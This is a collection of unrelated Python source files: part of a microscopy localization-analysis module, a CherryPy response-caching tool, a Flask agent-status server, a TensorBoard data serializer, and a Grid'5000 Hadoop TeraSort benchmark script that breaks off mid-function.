link_group, n_locs, n_groups): result = _np.zeros(n_groups, dtype=column.dtype) for i in range(n_locs): i_ = link_group[i] result[i_] = column[i] return result def link_loc_groups(locs, info, link_group, remove_ambiguous_lengths=True): n_locs = len(link_group) n_groups = link_group.max() + 1 n_ = _link_group_count(link_group, n_locs, n_groups) columns = _OrderedDict() if hasattr(locs, 'frame'): first_frame_, last_frame_ = _link_group_min_max(locs.frame, link_group, n_locs, n_groups) columns['frame'] = first_frame_ if hasattr(locs, 'x'): weights_x = 1 / locs.lpx**2 columns['x'], sum_weights_x_ = _link_group_weighted_mean(locs.x, weights_x, link_group, n_locs, n_groups, n_) if hasattr(locs, 'y'): weights_y = 1 / locs.lpy**2 columns['y'], sum_weights_y_ = _link_group_weighted_mean(locs.y, weights_y, link_group, n_locs, n_groups, n_) if hasattr(locs, 'photons'): columns['photons'] = _link_group_sum(locs.photons, link_group, n_locs, n_groups) if hasattr(locs, 'sx'): columns['sx'] = _link_group_mean(locs.sx, link_group, n_locs, n_groups, n_) if hasattr(locs, 'sy'): columns['sy'] = _link_group_mean(locs.sy, link_group, n_locs, n_groups, n_) if hasattr(locs, 'bg'): columns['bg'] = _link_group_sum(locs.bg, link_group, n_locs, n_groups) if hasattr(locs, 'x'): columns['lpx'] = _np.sqrt(1 / sum_weights_x_) if hasattr(locs, 'y'): columns['lpy'] = _np.sqrt(1 / sum_weights_y_) if hasattr(locs, 'ellipticity'): columns['ellipticity'] = _link_group_mean(locs.ellipticity, link_group, n_locs, n_groups, n_) if hasattr(locs, 'net_gradient'): columns['net_gradient'] = _link_group_mean(locs.net_gradient, link_group, n_locs, n_groups, n_) if hasattr(locs, 'likelihood'): columns['likelihood'] = _link_group_mean(locs.likelihood, link_group, n_locs, n_groups, n_) if hasattr(locs, 'iterations'): columns['iterations'] = _link_group_mean(locs.iterations, link_group, n_locs, n_groups, n_) if hasattr(locs, 'z'): columns['z'] = _link_group_mean(locs.z, link_group, n_locs, n_groups, n_) if 
hasattr(locs, 'd_zcalib'): columns['d_zcalib'] = _link_group_mean(locs.d_zcalib, link_group, n_locs, n_groups, n_) if hasattr(locs, 'group'): columns['group'] = _link_group_last(locs.group, link_group, n_locs, n_groups) if hasattr(locs, 'frame'): columns['len'] = last_frame_ - first_frame_ + 1 columns['n'] = n_ if hasattr(locs, 'photons'): columns['photon_rate'] = _np.float32(columns['photons'] / n_) linked_locs = _np.rec.array(list(columns.values()), names=list(columns.keys())) if remove_ambiguous_lengths: valid = _np.logical_and(first_frame_ > 0, last_frame_ < info[0]['Frames']) linked_locs = linked_locs[valid] return linked_locs def localization_precision(photons, s, bg, em): ''' Calculates the theoretical localization preicision according to Mortensen et al., Nat Meth, 2010 ''' s2 = s**2 sa2 = s2 + 1/12 v = sa2 * (16/9 + (8 * _np.pi * sa2 * bg) / photons) / photons if em: v *= 2 with _np.errstate(invalid='ignore'): return _np.sqrt(v) def undrift(locs, info, segmentation, display=True, segmentation_callback=None, rcc_callback=None): bounds, segments = _render.segment(locs, info, segmentation, {'blur_method': 'gaussian', 'min_blur_width': 1}, segmentation_callback) shift_y, shift_x = _imageprocess.rcc(segments, 32, rcc_callback) t = (bounds[1:] + bounds[:-1]) / 2 drift_x_pol = _interpolate.InterpolatedUnivariateSpline(t, shift_x, k=3) drift_y_pol = _interpolate.InterpolatedUnivariateSpline(t, shift_y, k=3) t_inter = _np.arange(info[0]['Frames']) drift = (drift_x_pol(t_inter), drift_y_pol(t_inter)) drift = _np.rec.array(drift, dtype=[('x', 'f'), ('y', 'f')]) if display: fig1 = _plt.figure(figsize=(17, 6)) _plt.suptitle('Estimated drift') _plt.subplot(1, 2, 1) _plt.plot(drift.x, label='x interpolated') _plt.plot(drift.y, label='y interpolated') t = (bounds[1:] + bounds[:-1]) / 2 _plt.plot(t, shift_x, 'o', color=list(_plt.rcParams['axes.prop_cycle'])[0]['color'], label='x') _plt.plot(t, shift_y, 'o', color=list(_plt.rcParams['axes.prop_cycle'])[1]['color'], 
label='y') _plt.legend(loc='best') _plt.xlabel('Frame') _plt.ylabel('Drift (pixel)') _plt.subplot(1, 2, 2) _plt.plot(drift.x, drift.y, color=list(_plt.rcParams['axes.prop_cycle'])[2]['color']) _plt.plot(shift_x, shift_y, 'o', color=list(_plt.rcParams['axes.prop_cycle'])[2]['color']) _plt.axis('equal') _plt.xlabel('x') _plt.ylabel('y') fig1.show() locs.x -= drift.x[locs.frame] locs.y -= drift.y[locs.frame] return drift, locs def align(locs, infos, display=False): images = [] for i, (locs_, info_) in enumerate(zip(locs, infos)): _, image = _render.render(locs_, info_, blur_method='smooth') images.append(image) shift_y, shift_x = _imageprocess.rcc(images) print('Image x shifts: {}'.format(shift_x)) print('Image y shifts: {}'.format(shift_y)) for i, (locs_, dx, dy) in enumerate(zip(locs, shift_x, shift_y)): locs_.y -= dy locs_.x -= dx return locs def groupprops(locs, callback=None): try: locs = locs[locs.dark != -1] except AttributeError: pass group_ids = _np.unique(locs.group) n = len(group_ids) n_cols = len(locs.dtype) names = ['group', 'n_events'] + list(_itertools.chain(*[(_ + '_mean', _ + '_std') for _ in locs.dtype.names])) formats = ['i4', 'i4'] + 2 * n_cols * ['f4'] groups = _np.recarray(n, formats=formats, names=names) if callback is not None: callback(0) for i, group_id in enumerate(_tqdm(group_ids, desc='Calculating group statistics', unit='Groups')): group_locs = locs[locs.group == group_id] groups['group'][i] = group_id groups['n_events'][i] = len(group_locs) for name in locs.dtype.names: groups[name + '_mean'][i] = _np.mean(group_locs[name]) groups[name + '_std'][i] = _np.std(group_locs[name]) if callback is not None: callback(i+1) return groups #FRET functions def calculate_fret(acc_locs, don_locs): """ Calculate the FRET efficiceny in picked regions, this is for one trace """ fret_dict = {} if len(acc_locs) == 0: max_frames = _np.max(don_locs['frame']) elif len(don_locs) == 0: max_frames = _np.max(acc_locs['frame']) else: max_frames = 
_np.max([_np.max(acc_locs['frame']),_np.max(don_locs['frame'])]) #Initialize a vector filled with zeros for the duration of the movie xvec = _np.arange(max_frames+1) yvec = xvec[:]*0 acc_trace = yvec.copy() don_trace = yvec.copy() #Fill vector with the photon numbers of events that happend acc_trace[acc_locs['frame']]=acc_locs['photons']-acc_locs['bg'] don_trace[don_locs['frame']]=don_locs['photons']-don_locs['bg'] #Calculate the FRET efficiency fret_trace = acc_trace/(acc_trace+don_trace) #Only select FRET values between 0 and 1 selector = _np.logical_and(fret_trace>0,fret_trace<1) #select the final fret events based on the 0 to 1 range fret_events = fret_trace[selector] fret_timepoints = _np.arange(len(fret_trace))[selector] # Calculate FRET localizations: Select the localizations when FRET happens #loc_selector = [True if _ in fret_timepoints else False for _ in don_locs['frame'] ] #fret_locs = don_locs[loc_selector==True] sel_locs = [] for element in fret_timepoints: sel_locs.append(don_locs[don_locs['frame']==element]) fret_locs = stack_arrays(sel_locs, asrecarray=True, usemask=False) fret_locs = _lib.append_to_rec(fret_locs, _np.array(fret_events), 'fret') fret_dict['fret_events'] = _np.array(fret_events) fret_dict['fret_timepoints'] = fret_timepoints fret_dict['acc_trace'] = acc_trace fret_dict['don_trace'] = don_trace fret_dict['frames'] = xvec fret_dict['maxframes'] = max_frames return fret_dict, fret_locs
caching.py
import datetime import threading import time import cherrypy from cherrypy.lib import cptools, http class MemoryCache: maxobjects = 1000 maxobj_size = 100000 maxsize = 10000000 delay = 600 def __init__(self): self.clear() t = threading.Thread(target=self.expire_cache, name='expire_cache') self.expiration_thread = t if hasattr(threading.Thread, "daemon"): # Python 2.6+ t.daemon = True else: t.setDaemon(True) t.start() def clear(self): """Reset the cache to its initial, empty state.""" self.cache = {} self.expirations = {} self.tot_puts = 0 self.tot_gets = 0 self.tot_hist = 0 self.tot_expires = 0 self.tot_non_modified = 0 self.cursize = 0 def key(self): return cherrypy.url(qs=cherrypy.request.query_string) def expire_cache(self): # expire_cache runs in a separate thread which the servers are # not aware of. It's possible that "time" will be set to None # arbitrarily, so we check "while time" to avoid exceptions. # See tickets #99 and #180 for more information. while time: now = time.time() for expiration_time, objects in self.expirations.items(): if expiration_time <= now: for obj_size, obj_key in objects: try: del self.cache[obj_key] self.tot_expires += 1 self.cursize -= obj_size except KeyError: # the key may have been deleted elsewhere pass del self.expirations[expiration_time] time.sleep(0.1) def get(self): """Return the object if in the cache, else None.""" self.tot_gets += 1 cache_item = self.cache.get(self.key(), None) if cache_item: self.tot_hist += 1 return cache_item else: return None def put(self, obj): if len(self.cache) < self.maxobjects: # Size check no longer includes header length obj_size = len(obj[2]) total_size = self.cursize + obj_size # checks if there's space for the object if (obj_size < self.maxobj_size and total_size < self.maxsize): # add to the expirations list and cache expiration_time = cherrypy.response.time + self.delay obj_key = self.key() bucket = self.expirations.setdefault(expiration_time, []) bucket.append((obj_size, obj_key)) 
self.cache[obj_key] = obj self.tot_puts += 1 self.cursize = total_size def delete(self): self.cache.pop(self.key(), None) def get(invalid_methods=("POST", "PUT", "DELETE"), **kwargs): """Try to obtain cached output. If fresh enough, raise HTTPError(304). If POST, PUT, or DELETE: * invalidates (deletes) any cached response for this resource * sets request.cached = False * sets request.cacheable = False else if a cached copy exists: * sets request.cached = True * sets request.cacheable = False * sets response.headers to the cached values * checks the cached Last-Modified response header against the current If-(Un)Modified-Since request headers; raises 304 if necessary. * sets response.status and response.body to the cached values * returns True otherwise: * sets request.cached = False * sets request.cacheable = True * returns False """ request = cherrypy.request # POST, PUT, DELETE should invalidate (delete) the cached copy. # See http://www.w3.org/Protocols/rfc2616/rfc2616-sec13.html#sec13.10. if request.method in invalid_methods: cherrypy._cache.delete() request.cached = False request.cacheable = False return False cache_data = cherrypy._cache.get() request.cached = c = bool(cache_data) request.cacheable = not c if c: response = cherrypy.response s, h, b, create_time, original_req_headers = cache_data # Check 'Vary' selecting headers. If any headers mentioned in "Vary" # differ between the cached and current request, bail out and # let the rest of CP handle the request. 
This should properly # mimic the behavior of isolated caches as RFC 2616 assumes: # "If the selecting request header fields for the cached entry # do not match the selecting request header fields of the new # request, then the cache MUST NOT use a cached entry to satisfy # the request unless it first relays the new request to the origin # server in a conditional request and the server responds with # 304 (Not Modified), including an entity tag or Content-Location # that indicates the entity to be used. # TODO: can we store multiple variants based on Vary'd headers? for header_element in h.elements('Vary'): key = header_element.value if original_req_headers[key] != request.headers.get(key, 'missing'): request.cached = False request.cacheable = True return False # Copy the response headers. See http://www.cherrypy.org/ticket/721. response.headers = rh = http.HeaderMap() for k in h: dict.__setitem__(rh, k, dict.__getitem__(h, k)) # Add the required Age header response.headers["Age"] = str(int(response.time - create_time)) try: # Note that validate_since depends on a Last-Modified header; # this was put into the cached copy, and should have been # resurrected just above (response.headers = cache_data[1]). cptools.validate_since() except cherrypy.HTTPRedirect, x: if x.status == 304: cherrypy._cache.tot_non_modified += 1 raise # serve it & get out from the request response.status = s response.body = b return c def tee_output(): def tee(body): """Tee response.body into a list.""" output = [] for chunk in body: output.append(chunk) yield chunk # Might as well do this here; why cache if the body isn't consumed? 
if response.headers.get('Pragma', None) != 'no-cache': # save the cache data body = ''.join(output) vary = [he.value for he in cherrypy.response.headers.elements('Vary')] if vary: sel_headers = dict([(k, v) for k, v in cherrypy.request.headers.iteritems() if k in vary]) else: sel_headers = {} cherrypy._cache.put((response.status, response.headers or {}, body, response.time, sel_headers)) response = cherrypy.response response.body = tee(response.body) def expires(secs=0, force=False): """Tool for influencing cache mechanisms using the 'Expires' header. 'secs' must be either an int or a datetime.timedelta, and indicates the number of seconds between response.time and when the response should expire. The 'Expires' header will be set to (response.time + secs). If 'secs' is zero, the 'Expires' header is set one year in the past, and the following "cache prevention" headers are also set: 'Pragma': 'no-cache' 'Cache-Control': 'no-cache, must-revalidate' If 'force' is False (the default), the following headers are checked: 'Etag', 'Last-Modified', 'Age', 'Expires'. If any are already present, none of the above response headers are set. """ response = cherrypy.response headers = response.headers cacheable = False if not force: # some header names that indicate that the response can be cached for indicator in ('Etag', 'Last-Modified', 'Age', 'Expires'): if indicator in headers: cacheable = True break if not cacheable: if isinstance(secs, datetime.timedelta): secs = (86400 * secs.days) + secs.seconds if secs == 0: if force or "Pragma" not in headers: headers["Pragma"] = "no-cache" if cherrypy.request.protocol >= (1, 1): if force or "Cache-Control" not in headers: headers["Cache-Control"] = "no-cache, must-revalidate" # Set an explicit Expires date in the past. expiry = http.HTTPDate(1169942400.0) else: expiry = http.HTTPDate(response.time + secs) if force or "Expires" not in headers: headers["Expires"] = expiry
rest.py
import json import threading import logging from flask import Flask, make_response, request import requests from .modulemanager import ModuleManager app = Flask(__name__, static_url_path='', static_folder='./site') def agent_to_json(agent) -> dict: return {"name": agent.identifier, "type": agent.agent_type, "alive": agent.is_alive(), "threadId": agent.ident} """ One page app handler, always returns index.html For some strange reason @app.route("/<path:_>") didn't work, this should be investigated but for now the below works """ @app.route("/") @app.route("/<_>") @app.route("/<_>/<__>") @app.route("/<_>/<__>/<___>") def index(**_): return app.send_static_file("index.html") @app.route("/api/0/agents") def get_agents(): agents = [] for agent in ModuleManager().agents: agents.append(agent_to_json(agent)) return json.dumps(agents) @app.route("/api/0/agents/<int:agent_id>") def get_agent(agent_id): for agent in ModuleManager().agents: if agent._ident == agent_id: return json.dumps(agent_to_json(agent)) return make_response("Resource not found", 400) @app.route("/scripts/<file>") def scripts(file): return app.send_static_file("scripts/" + file) @app.route("/templates/<file>") def templates(file): return app.send_static_file("templates/" + file) def start_server(): thread = threading.Thread(target=app.run, daemon=True) thread.start()
serialize_tensorboard.py
# Copyright 2015 Google Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Consume and serialize all of the data from a running TensorBoard instance. This program connects to a live TensorBoard backend at given port, and saves all of the data to local disk JSON in a predictable format. This makes it easy to mock out the TensorBoard backend so that the frontend may be tested in isolation. """ from __future__ import absolute_import from __future__ import division from __future__ import print_function import gzip import json import os import os.path import shutil import StringIO import threading import urllib import six from six.moves import http_client import tensorflow as tf from tensorflow.python.summary import event_multiplexer from tensorflow.tensorboard.backend import server tf.flags.DEFINE_string('logdir', None, """the logdir to pass to the TensorBoard backend; data will be read from this logdir for serialization.""") tf.flags.DEFINE_string('target', None, """The directoy where serialized data will be written""") tf.flags.DEFINE_boolean('overwrite', False, """Whether to remove and overwrite TARGET if it already exists.""") tf.flags.DEFINE_boolean( 'purge_orphaned_data', True, 'Whether to purge data that ' 'may have been orphaned due to TensorBoard restarts. 
' 'Disabling purge_orphaned_data can be used to debug data ' 'disappearance.') FLAGS = tf.flags.FLAGS BAD_CHARACTERS = "#%&{}\\/<>*? $!'\":@+`|=" def Url(route, params): """Takes route and query params, and produce encoded url for that asset.""" out = route if params: # sorting ensures a unique filename for each query sorted_params = sorted(six.iteritems(params)) out += '?' + urllib.urlencode(sorted_params) return out def Clean(s): """Clean a string so it can be used as a filepath.""" for c in BAD_CHARACTERS: s = s.replace(c, '_') return s class TensorBoardStaticSerializer(object): """Serialize all the routes from a TensorBoard server to static json.""" def __init__(self, connection, target_path): self.connection = connection EnsureDirectoryExists(os.path.join(target_path, 'data')) self.path = target_path def GetAndSave(self, url, unzip=False): """GET the given url. Serialize the result at clean path version of url.""" self.connection.request('GET', '/data/' + url, headers={'content-type': 'text/plain'}) response = self.connection.getresponse() destination = self.path + '/data/' + Clean(url) if response.status != 200: raise IOError(url) if unzip: s = StringIO.StringIO(response.read()) content = gzip.GzipFile(fileobj=s).read() else: content = response.read() with open(destination, 'w') as f: f.write(content) return content def GetRouteAndSave(self, route, params=None): """GET given route and params. Serialize the result. Return as JSON.""" url = Url(route, params) return json.loads(self.GetAndSave(url)) def Run(self): """Serialize everything from a TensorBoard backend.""" # get the runs object, which is an index for every tag. runs = self.GetRouteAndSave('runs') # collect sampled data. self.GetRouteAndSave('scalars') # now let's just download everything! for run, tag_type_to_tags in six.iteritems(runs): for tag_type, tags in six.iteritems(tag_type_to_tags): try: if tag_type == 'graph': # in this case, tags is a bool which specifies if graph is present. 
if tags: url = Url('graph', {'run': run}) self.GetAndSave(url, unzip=True) elif tag_type == 'images': for t in tags: images = self.GetRouteAndSave('images', {'run': run, 'tag': t}) for im in images: url = 'individualImage?' + im['query'] # pull down the images themselves. self.GetAndSave(url) else: for t in tags: # Save this, whatever it is :) self.GetRouteAndSave(tag_type, {'run': run, 'tag': t}) except IOError as e: PrintAndLog('Retrieval failed for %s/%s/%s' % (tag_type, run, tags), tf.logging.WARN) PrintAndLog('Got Exception: %s' % e, tf.logging.WARN) PrintAndLog('continuing...', tf.logging.WARN) continue def EnsureDirectoryExists(path): if not os.path.exists(path): os.makedirs(path) def PrintAndLog(msg, lvl=tf.logging.INFO): tf.logging.log(lvl, msg) print(msg) def main(unused_argv=None): target = FLAGS.target logdir = FLAGS.logdir if not target or not logdir: PrintAndLog('Both --target and --logdir are required.', tf.logging.ERROR) return -1 if os.path.exists(target): if FLAGS.overwrite: if os.path.isdir(target): shutil.rmtree(target) else: os.remove(target) else: PrintAndLog('Refusing to overwrite target %s without --overwrite' % target, tf.logging.ERROR) return -2 path_to_run = server.ParseEventFilesSpec(FLAGS.logdir) PrintAndLog('About to load Multiplexer. This may take some time.') multiplexer = event_multiplexer.EventMultiplexer( size_guidance=server.TENSORBOARD_SIZE_GUIDANCE, purge_orphaned_data=FLAGS.purge_orphaned_data) server.ReloadMultiplexer(multiplexer, path_to_run) PrintAndLog('Multiplexer load finished. Starting TensorBoard server.') s = server.BuildServer(multiplexer, 'localhost', 0) server_thread = threading.Thread(target=s.serve_forever) server_thread.daemon = True server_thread.start() connection = http_client.HTTPConnection('localhost', s.server_address[1]) PrintAndLog('Server setup! 
Downloading data from the server.') x = TensorBoardStaticSerializer(connection, target) x.Run() PrintAndLog('Done downloading data.') connection.close() s.shutdown() s.server_close() if __name__ == '__main__': tf.app.run()
experiment.py
#!/usr/bin/env python
# Grid'5000 / execo experiment engine: runs a Hadoop TeraGen + TeraSort
# benchmark while an Active Data service scrapes the Hadoop logs and
# publishes life-cycle transitions for the dataset.
# NOTE(review): this is Python 2 code (print statement in _make_reservation,
# list-returning filter in setup_hosts) -- it will not run under Python 3.
import traceback
import logging, time, datetime, signal
import pprint, os, sys, math

pp = pprint.PrettyPrinter(indent=4).pprint

from threading import Thread
from time import sleep

import execo as EX
from string import Template
from execo import configuration
from execo.log import style
from execo.process import ProcessOutputHandler
import execo_g5k as EX5
from execo_g5k.api_utils import get_cluster_site
from execo_engine import Engine, ParamSweeper, logger, sweep, sweep_stats, slugify
from hadoop_g5k import HadoopCluster, HadoopJarJob

#EX.logger.setLevel(logging.ERROR)
#logger.setLevel(logging.ERROR)

#EXCLUDED_ELEMENTS = ['paranoia-4', 'paranoia-7', 'paranoia-8']
EXCLUDED_ELEMENTS = []

# Shortcut
funk = EX5.planning

# Experiment defaults and fixed remote paths
job_name = 'ActiveDataHadoop'
job_path = "/root/hduser/terasort-"
default_ad_cluster = 'parapide'
default_work_cluster = 'paranoia'
default_n_nodes = 5
default_walltime = "3:00:00"
XP_BASEDIR = '/home/ansimonet/active_data_hadoop'
AD_JAR_NAME = 'active-data-lib-0.2.0.jar'
HADOOP_LOG_PATH = '/tmp/hadoop/logs/'
AD_RESULT_PATH = '/tmp/transitions_per_second.log'
# Extra -D options passed to every Hadoop job; contains one %d placeholder
# for the per-task JVM heap size (filled with mem_per_node at call sites).
# NOTE(review): no trailing space after 'count=10', so it is fused with the
# following '-Dmapreduce...' option when concatenated -- likely a bug; confirm.
HADOOP_OPTIONS = '-Ddfs.namenode.handler.count=40 ' + \
                 '-Ddfs.datanode.handler.count=10' + \
                 '-Dmapreduce.map.output.compress=true ' + \
                 '-Dmapreduce.map.output.compress.codec=org.apache.hadoop.io.compress.GzipCodec ' + \
                 '-Dmapred.child.java.opts=\'-Xms%d\''


class ad_hadoop(Engine):

    def __init__(self):
        """Define options for the experiment"""
        super(ad_hadoop, self).__init__()
        self.options_parser.add_option("-k", dest="keep_alive",
                                       help="Keep the reservation alive.",
                                       action="store_true")
        self.options_parser.add_option("-j", dest="job_id",
                                       help="job_id to relaunch an engine.",
                                       type=int)
        self.options_parser.add_option("--ad-cluster",
                                       default=default_ad_cluster,
                                       help="The cluster on which to run ActiveData.")
        self.options_parser.add_option("--work-cluster",
                                       default=default_work_cluster,
                                       help="The cluster on which to run Hadoop.")
        self.options_parser.add_option("--n-nodes",
                                       default=default_n_nodes, type=int,
                                       help="The number of nodes to use.")
        self.options_parser.add_option("--n-reducers", type=int,
                                       help="The number of reducers to use.")
        self.options_parser.add_option("--walltime",
                                       default=default_walltime,
                                       help="The duration of the experiment.")
        self.options_parser.add_option("--size", type=int,
                                       help="Dataset size (in GB)")

    def run(self):
        """Perform experiment"""
        logger.detail(self.options)
        try:
            # Checking the options
            if self.options.n_reducers is None or self.options.size is None:
                logger.error("Both --n-reducer and --size are mandatory.")
                exit(1)

            # Retrieving the hosts for the experiment
            hosts = self.get_hosts()
            if hosts is None:
                logger.error("Cannot get host for request")
                exit(1)

            # Deploying OS and copying required file
            AD_node, hadoop_cluster = self.setup_hosts(hosts)

            # Starting the processes
            server = self._start_active_data_server(AD_node)
            listener = self._start_active_data_listener(AD_node)

            # Terasort takes the number of 100-byte rows to generate
            data_size_bytes = self.options.size * 1000 * 1000 * 1000
            data_size = data_size_bytes / 100

            # Use a mapper per core
            attr = EX5.get_host_attributes(self.options.work_cluster + '-1')
            n_cpu_per_node = attr['architecture']['smt_size']
            mem_per_node = attr['main_memory']['ram_size']
            n_mappers = int(n_cpu_per_node) * self.options.n_nodes
            mem_per_task = (int(mem_per_node) - 1000) / n_cpu_per_node  # leave 1Gb out for the system
            logger.info("The experiment will use %s mappers and %s reducers",
                        style.emph(n_mappers),
                        style.emph(self.options.n_reducers))
            logger.info("Using %s of memory for each task",
                        style.emph(sizeof_fmt(mem_per_task)))

            # First Hadoop job to generate the dataset
            hadoop_stdout_path = os.path.join(self.result_dir, "hadoop.stdout")
            hadoop_stderr_path = os.path.join(self.result_dir, "hadoop.stderr")
            fout = open(hadoop_stdout_path, 'w')
            ferr = open(hadoop_stderr_path, 'w')
            logger.info("Generating a %s input file" % (sizeof_fmt(data_size_bytes)))
            generate = HadoopJarJob('jars/hadoop-examples-1.2.1.jar',
                                    "teragen -Dmapred.map.tasks=%d -Dmapred.tasktracker.map.tasks.maximum=%s %s %s %sinput"
                                    % (n_mappers, n_cpu_per_node,
                                       HADOOP_OPTIONS % mem_per_node,
                                       data_size, job_path))
            gen_out, gen_err = hadoop_cluster.execute_job(generate)
            fout.write(gen_out)
            ferr.write(gen_err)

            # Create an Active Data life cycle for the input dataset
            cmd = "java -cp \"jars/*\" org.inria.activedata.examples.cmdline.PublishNewLifeCycle %s %s %s" % \
                  (AD_node, "org.inria.activedata.hadoop.model.HDFSModel", job_path + "input")
            create_lc = EX.Process(cmd)
            create_lc.start()
            create_lc.wait()
            logger.info(create_lc.stdout)
            if not create_lc.ok:
                logger.error(create_lc.stderr)
                exit(1)

            # Start the second Hadoop job on a separate thread: the actual benchmark
            sort = HadoopJarJob('jars/hadoop-examples-1.2.1.jar',
                                "terasort -Dmapred.reduce.tasks=%d -Dmapred.map.tasks=%d -Dmapred.tasktracker.map.tasks.maximum=%s -Dmapred.tasktracker.reduce.tasks.maximum=%s %s %sinput "
                                "%soutput"
                                % (self.options.n_reducers, n_mappers,
                                   n_cpu_per_node, n_cpu_per_node,
                                   HADOOP_OPTIONS % mem_per_node,
                                   job_path, job_path))

            def run_sort(sort, fout, ferr):
                # Runs in a worker thread so the engine can publish the
                # composition transition while the job is executing.
                sort_out, sort_err = hadoop_cluster.execute_job(sort)
                fout.write(sort_out)
                ferr.write(sort_err)

            sort_thread = Thread(target=run_sort, args=(sort, fout, ferr), name="sort")
            sort_thread.start()

            # Publish the composition transition as soon as we got the Hadoop job_id
            while sort.job_id == "unknown":
                sleep(0.1)
            logger.info("The id of the sort job is " + sort.job_id)

            # sort.job_id[4:] strips the leading "job_" prefix
            cmd = "java -cp \"jars/*\" org.inria.activedata.examples.cmdline.PublishTransition %s -m org.inria.activedata.hadoop.model.HDFSModel -t 'HDFS.create Hadoop job' -sid HDFS -uid %sinput -newId %s" \
                  % (AD_node, job_path, sort.job_id[4:])
            compose = EX.Process(cmd)
            compose.start()
            compose.wait()
            logger.info(compose.stdout)
            if(not compose.ok):
                logger.error(compose.stderr)
                exit(1)

            # Start the scrappers, tell them to pay attention only to the sort job
            clients = self._start_active_data_clients(AD_node, hadoop_cluster,
                                                      only=sort.job_id[4:])

            # Wait for the sort job to complete
            sort_thread.join()

            # Leave a few seconds for all the scrapers to do their job
            sleep(600)

            fout.close()
            ferr.close()

            # Terminate everything
            clients.kill()
            listener.kill()

            # Kindly ask the service to quit
            EX.Process('java -cp "jars/*" org.inria.activedata.examples.cmdline.EndExperiment '
                       + server.host.address
                       + ' ' + AD_RESULT_PATH).run()

            # Get the logs back from the machines
            self._get_logs(hadoop_cluster, server.host)
        finally:
            # NOTE(review): if an early step fails, hadoop_cluster may be
            # unbound here and this raises NameError -- confirm intended.
            hadoop_cluster.stop()
            if not self.options.keep_alive:
                EX5.oardel([(self.job_id, self.site)])
            exit()

    def _start_active_data_clients(self, server, hadoop_cluster, port=1200,
                                   hdf_path='/root/hduser/terasort-input',
                                   only=""):
        """Return a started client action"""
        if only != "":
            only = "-o " + only
        # One scrapper per tasktracker node, tailing its Hadoop log
        cmd = "java -cp 'jars/*' -Dlog4j.configurationFile=log4j2.xml " + \
              "org.inria.activedata.hadoop.HadoopScrapper " + \
              server + " " + HADOOP_LOG_PATH + "hadoop-root-tasktracker-{{{host}}}.log " + only
        tasktracker = EX.Remote(cmd, hadoop_cluster.hosts)
        # Don't print a warning when the jobs are killed
        for p in tasktracker.processes:
            p.nolog_exit_code = p.ignore_exit_code = True
        # A single scrapper on the master for the jobtracker log
        cmd = "java -cp 'jars/*' -Dlog4j.configurationFile=log4j2.xml " + \
              "org.inria.activedata.hadoop.HadoopScrapper " + \
              server + " " + HADOOP_LOG_PATH + "hadoop-root-jobtracker-{{{host}}}.log " + only
        jobtracker = EX.Remote(cmd, [hadoop_cluster.master])
        for p in jobtracker.processes:
            p.nolog_exit_code = p.ignore_exit_code = True
        clients = EX.ParallelActions([tasktracker, jobtracker])
        # Setup output handlers
        for p in clients.processes:
            # Treat the jobtracker scraper differently
            if "jobtracker" in p.remote_cmd:
                stdout = os.path.join(self.result_dir, 'scrapper-jobtracker.stdout')
                stderr = os.path.join(self.result_dir, 'scrapper-jobtracker.stderr')
            else:
                stdout = os.path.join(self.result_dir, 'scrapper-' + p.host.address + '.stdout')
                stderr = os.path.join(self.result_dir, 'scrapper-' + p.host.address + '.stderr')
            p.stdout_handlers.append(stdout)
            p.stderr_handlers.append(stderr)
        clients.start()
        return clients

    def _start_active_data_listener(self, ad_server, port=1200,
                                    hdf_path='/root/hduser/terasort-input'):
        """Return a started listener process"""
        cmd = "java -cp 'jars/*' org.inria.activedata.hadoop.HadoopListener %s %s %s" \
              % (ad_server, port, hdf_path)
        out_path = os.path.join(self.result_dir, "listener")
        listener = EX.SshProcess(cmd, ad_server)
        listener.stdout_handlers.append(out_path + ".stdout")
        listener.stderr_handlers.append(out_path + ".stderr")
        # The listener is killed at the end of the run; don't log that
        listener.nolog_exit_code = listener.ignore_exit_code = True
        listener.start()
        return listener

    def _start_active_data_server(self, ad_server):
        """Return a started server process, or False if it crashed at startup"""
        stdout_path = os.path.join(self.result_dir, "server.stdout")
        stderr_path = os.path.join(self.result_dir, "server.stderr")
        # NOTE(review): '-Xmx' is given twice; the first one was probably
        # meant to be '-Xms1G' -- confirm.
        options = "-Djava.security.policy=server.policy " \
                  + "-server -Xmx1G -Xmx10G"
        cmd = "java " + options + " -cp \"jars/*\" org.inria.activedata.examples.cmdline.RunService -vv"
        logger.info("Running command " + cmd)
        server = EX.SshProcess(cmd, ad_server)
        server.stdout_handlers.append(stdout_path)
        server.stderr_handlers.append(stderr_path)
        server.nolog_exit_code = server.ignore_exit_code = True
        server.start()
        logger.info("Active Data Service started on " + server.host.address)
        # Give the JVM a moment to come up before checking it survived
        time.sleep(2)
        if not server.running:
            logger.error("Active Data Service crashed\n %s \n%s",
                         server.stdout, server.stderr)
            return False
        return server

    def setup_hosts(self, hosts):
        """Deploy operating setup active data on the service node and Hadoop on all"""
        logger.info('Deploying hosts')
        deployed_hosts, _ = EX5.deploy(EX5.Deployment(hosts=hosts,
                                                      env_name="wheezy-x64-prod"))
        # Copy the jars required by Active Data
        EX.Put(hosts, [XP_BASEDIR + '/jars']).run()
        # Active Data server: first deployed host of the AD cluster
        # (Python 2 filter returns a list, hence the [0] indexing)
        AD_node = filter(lambda x: self.options.ad_cluster in x, deployed_hosts)[0]
        EX.Put(hosts, [XP_BASEDIR + '/server.policy']).run()
        EX.Put(hosts, [XP_BASEDIR + '/log4j2.xml']).run()
        # Hadoop Cluster: every remaining deployed host
        deployed_hosts.remove(AD_node)
        workers = [EX.Host(host) for host in list(deployed_hosts)]
        EX.Put(workers, ['~/.ssh/']).run()
        logger.info('Creating Hadoop cluster on %s',
                    ' '.join([style.host(host.address) for host in workers]))
        cluster = HadoopCluster(workers)
        cluster.bootstrap('hadoop-1.2.1.tar.gz')
        cluster.initialize()
        cluster.start()
        return AD_node, cluster

    def get_hosts(self):
        """Returns the hosts from an existing reservation if provided,
        or from a new reservation"""
        logger.info('Retrieving hosts list')
        self.site = get_cluster_site(self.options.ad_cluster)
